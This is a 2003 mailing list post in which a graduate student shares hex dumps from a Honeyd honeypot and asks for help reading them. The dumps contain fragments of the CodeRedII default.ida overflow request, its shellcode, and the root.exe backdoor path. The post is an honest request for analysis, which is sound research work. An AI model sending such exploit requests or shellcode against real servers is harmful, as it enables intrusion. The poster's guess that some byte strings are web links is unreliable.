Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

Need Help

From: Pat Garlick <patlg1 () netzero net>
Date: 19 Aug 2003 06:01:41 -0000


Hello:

I've have some captured files from a Honeyd that was in operation back in 
May-June of this year.  I launched this Honeyd as part of my Graduate 
Studies Project.  The one thing that occurred frequently on this box was 
the attempted launch of a CodeRedII Worm and Buffer Over Flows.

On these files is some other activity that I am not proficient enough to 
decipher what is going on.  I am making some guesses that there was 
loading of files going on? I am posting this to find out if someone in 
this users group would be able to adequately provide information?  I will 
be adding it to the paper that I have to write and I want to be as 
accurate as possible.  If there is another users group that I should be 
submitting this to, let me know that as well.

A small portion of one of the captured files I have pasted below. If it 
doesn't come through or is jumbled, let me know how I can submit it. I 
look forward to hearing from whoever soon with your help with this need. 
Thanks much, Pat.

This was converted in a Hex Editor to text and binary.

54 0B 78 03 00 00 42 0C 00 3C 03 4B 45 52 4E 75         T.x...B..<.KERNu
00 00 7C 03 04 45 4C 33 32 75 00 33 00 49 00 72  ..|..EL32u.3.I.r
20 03 00 00 41 00 00 3C 03 47 65 74 50 75 00 00          ...A..<.GetPu..
7C 03 04 72 6F 63 41 75 00 03 4A 10 49 00 00 03         |..rocAu..J.I...
4A 24 0F 00 0C 0B 00 00 02 03 4A 1C 00 04 0B 03         J$........J.....
00 00 44 24 24 64 67 00 06 00 00 58 61 00 00 51         ..D$$dg....Xa..Q
00 00 00 00 5D 00 00 45 00 00 0D 00 00 00 4C 6F  ....]..E......Lo
61 64 4C 69 62 72 61 72 79 41 00 00 75 00 00 55         adLibraryA..u..U
00 00 45 00 00 0D 00 00 00 43 72 65 61 74 65 54         ..E......CreateT
68 72 65 61 64 00 00 75 00 00 55 00 00 45 00 00         hread..u..U..E..
0D 00 00 00 47 65 74 54 69 63 6B 43 6F 75 6E 74  ....GetTickCount
00 00 75 00 00 55 00 00 45 00 00 06 00 00 00 53  ..u..U..E......S
6C 65 65 70 00 00 75 00 00 55 00 00 45 00 00 17         leep..u..U..E...
00 00 00 47 65 74 53 79 73 74 65 6D 44 65 66 61  ...GetSystemDefa
75 6C 74 4C 61 6E 67 49 44 00 00 75 00 00 55 00         ultLangID..u..U.
00 45 00 00 14 00 00 00 47 65 74 53 79 73 74 65  .E......GetSyste
6D 44 69 72 65 63 74 6F 72 79 41 00 00 75 00 00  mDirectoryA..u..
55 00 00 45 00 00 0A 00 00 00 43 6F 70 79 46 69         U..E......CopyFi
6C 65 41 00 00 75 00 00 55 00 00 45 00 00 10 00  leA..u..U..E....
00 00 47 6C 6F 62 61 6C 46 69 6E 64 41 74 6F 6D  ..GlobalFindAtom
41 00 00 75 00 00 55 00 00 45 00 00 0F 00 00 00         A..u..U..E......
47 6C 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 00 GlobalAddAtomA..
75 00 00 55 00 00 45 00 00 0C 00 00 00 43 6C 6F         u..U..E......Clo
73 65 48 61 6E 64 6C 65 00 00 75 00 00 55 00 00         seHandle..u..U..
45 00 00 08 00 00 00 5F 6C 63 72 65 61 74 00 00         E......_lcreat..
75 00 00 55 00 00 45 00 00 08 00 00 00 5F 6C 77  u..U..E......_lw
72 69 74 65 00 00 75 00 00 55 00 00 45 00 00 08         rite..u..U..E...
00 00 00 5F 6C 63 6C 6F 73 65 00 00 75 00 00 55         ..._lclose..u..U
00 00 45 00 00 0E 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
65 6D 54 69 6D 65 00 00 75 00 00 55 00 00 45 00  emTime..u..U..E.
00 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00  .....WS2_32.DLL.
00 55 00 46 00 3E 44 00 05 00 36 00 00 00 36 00  .U.F.>D...6...6.
00 00 00 06 25 5D 00 19 00 00 00 5F 00 2D 08 00         ....%]....._.-..

2">..</he...>\...6...6.....%]....._.-..E..(.l..@..\....DUhB.P.q.
..X..~.P.>..T..ad>....&lt;script&gt; ..function Homepage(){..<!--..// 
in real bits, urls get returned to our script like this:..// res
://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm ...../
/For testing use DocURL = "res://shdocvw.dll/http_404.htm#https:
//www.microsoft.com/bar.htm"...DocURL = document.URL;.......//th
is is where the http or https will be, as found by searching for
 :// but skipping the res://...protocolIndex=DocURL.indexOf("://
",4);......//this finds the ending slash for the domain server .
..serverIndex=D...>....6...6.....%]....._.-..E..(.m..@..[....DUh

........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGet
Tf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B
....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.
P........<a...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P.

This occurred just before the launch of the CodeRedII worm, a buffer 
overflow. I would like to know what is going on with \CMD.EXE and 
d:\inetpub\scripts\root.exe  What is that file?:


.@..d..GET/default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a  HTTP/1.0..Content-type: text/xml.Content-length: 3379 ......
..`........dg.6..dg.&.......h......\...P.U...\...P.U..@.....X...
.\........\CMD.EXE.^.....cj......d:\inetpub\scripts\root.exe...$
....\...P.U...>?I..6...6.....%]....._.-..E..(....@.......DUhB.P.
V.;.I.QuZP.>.$u.....>....N...N......_.-..%]....E..@.K@.j..dDUhB.
....V.P.QuZ.;.IP.@.#...bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%
u0000%u00=a  HTTP/1.0..Content-type: text/xml.Content-length: 3379 

One last portion below:

00 00 42 00 0E 01 01 01 01 01 01 01 70 00 42 01         ..B.........p.B.
70 00 42 00 00 00 00 00 00 00 00 68 00 00 00 42         p.B........h...B
00 01 01 01 01 31 00 00 18 50 00 00 35 01 01 01         .....1...P..5...
05 50 00 00 51 68 2E 64 6C 6C 68 65 6C 33 32 68         .P..Qh.dllhel32h
6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 43 68         kernQhounthickCh
47 65 74 54 66 00 6C 6C 51 68 33 32 2E 64 68 77         GetTf.llQh32.dhw
73 32 5F 66 00 65 74 51 68 73 6F 63 6B 66 00 74         s2_f.etQhsockf.t
6F 51 68 73 65 6E 64 00 18 10 00 42 00 45 00 50         oQhsend....B.E.P
00 16 50 00 45 00 50 00 45 00 50 00 16 50 00 10         ..P.E.P.E.P..P..
10 00 42 00 1E 00 03 3D 55 00 00 51 74 05 00 1C         ..B....=U..Qt...
10 00 42 00 16 00 00 31 00 51 51 50 00 00 03 01         ..B....1.QQP....
04 00 00 00 01 01 01 01 51 00 45 00 50 00 45 00         ........Q.E.P.E.
50 00 16 6A 11 6A 02 6A 02 00 00 50 00 45 00 50         P..j.j.j...P.E.P
00 45 00 50 00 16 00 00 09 00 00 00 3C 61 00 00         .E.P........<a..
00 45 00 00 0C 40 00 14 00 00 00 04 01 00 00 00         .E...@..........
08 29 00 00 04 00 01 00 00 45 00 6A 10 00 45 00  .).......E.j..E.
50 31 00 51 66 00 00 78 01 51 00 45 03 50 00 45         P1.Qf..x.Q.E.P.E
00 50 00 00 00 00 00 13 00 3E 77 00 0D 00 72 01         .P.......>w...r.
00 00 72 01 00 00 00 06 25 5D 00 19 00 00 00 5F  ..r.....%]....._
00 2D 08 00 45 00 01 64 00 6B 40 00 00 01 35 00  .-..E..d.k@...5.

B........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGe
tTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....
B....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j..-..>.{..

I found out that Q.E.P.E.P is really a web link.  There are several web 
links in all of the captured files with strange names.









---------------------------------------------------------------------------
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: